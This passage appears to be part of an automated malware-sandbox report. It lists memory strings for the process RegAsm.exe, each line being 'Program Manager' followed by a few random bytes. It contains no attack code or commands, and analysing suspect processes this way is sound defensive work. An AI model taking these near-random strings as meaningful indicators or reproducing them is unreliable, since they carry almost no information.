                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPQX
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhb7
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHan
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,K.
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\jR
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdzZ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTYS
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,kL
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@1=
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTyq
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdX|
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|&s
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q S[
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlGh
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$;8
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0tE
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<)M
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtz:
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`/e
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(As
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8 ~
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4|]
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qli{
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@Rd
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX@y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8d:
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXbW
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt|/
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$\B
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0uN
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHcc
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLD
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\k>
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(B|
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,mA
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@32
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT{f
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(dZ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxa`
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`sK
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,*Y
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4:a
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL(v
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(hy
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt]
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL.U
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT>]
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLNs
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh%c
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX&:
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|My
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\O\
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx$W
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP7N
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxg?
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt<z
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL/A
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT5
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH&Z
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxh)
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlO<
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 9Q
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8'f
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q Yo
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLr;
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,16
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxi4
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,QT
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qvH
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD?i
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,qr
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4B5
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpX5
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL0J
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4bS
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLPh
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTK
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|Ne
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX(/
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd`P
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|.G
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd@2
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXHM
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXhk
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@VN
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXDc
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxeJ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@vl
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`w5
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 5g
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8#|
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<NA
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlme
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlMG
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8EZ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\n<
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(Ff
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT_2
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd\f
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX%1
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd<H
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4>K
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL,`
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4^i
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@60
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLn\
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpV@
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$a5
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q('4
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<oh
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|Lp
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|,R
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHG/
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd>=
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0y8
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHgM
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPwU
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt;q
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXfv
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qwQ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8%q
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q Wz
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx=
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh#n
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q yX
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD=t
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\B`
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q ,C
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh;1
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-^q
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|cG
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(~G
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\CL
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@V
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(;_
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpkb
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX}M
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH9|
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q Ku
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0L^
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhZc
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$4P
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<"e
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$Tn
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`(}
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,EO
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4UW
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q.x
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,em
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPV
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh|v
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8=4
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP+I
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPKg
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`*r
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|d3
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx9n
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$Uw
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@N3
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@nQ
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT4B
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpL0
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q -L
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q Mj
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLf6
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q )b
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLB.
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4t7
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLbL
